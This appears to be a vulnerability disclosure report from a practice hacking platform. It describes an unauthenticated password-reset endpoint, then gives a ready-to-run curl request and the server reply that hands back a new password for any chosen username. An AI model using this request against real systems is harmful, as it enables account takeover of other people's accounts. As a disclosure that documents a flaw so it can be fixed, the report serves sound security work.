Description

There is a leak of information inside javascript code on this webpage https://792406c141d1-neolex.a.firstbloodhackers.com/drpanel/index.php That made me think that there is a editpassword endpoint somewhere. Indeed there is a endpoint on the following url https://792406c141d1-neolex.a.firstbloodhackers.com/drpanel/drapi/editpassword.php By sending a POST request with username=neolex data you can generate another password for any account.

step to reproduce

• run the following command

  curl -i -s -k -X $'POST' \
  -H $'Host: 792406c141d1-neolex.a.firstbloodhackers.com' -H $'Sec-Ch-Ua: \"Chromium\";v=\"95\", \";Not A Brand\";v=\"99\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: cross-site' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: iframe' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' -H $'X-SITE-REQ: permitted' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 15' \
  --data-binary $'username=neolex' \
  $'https://792406c141d1-neolex.a.firstbloodhackers.com/drpanel/drapi/editpassword.php'

  with replacing the username neolex by the account you want to takeover

• the response will be something like :

  Password updated - DAWI9RpJG7rVQZg

  where DAWI9RpJG7rVQZg is the new password of the account you choose

Impact

An attacker is able to trigger a 0 click account takeover and takeover any account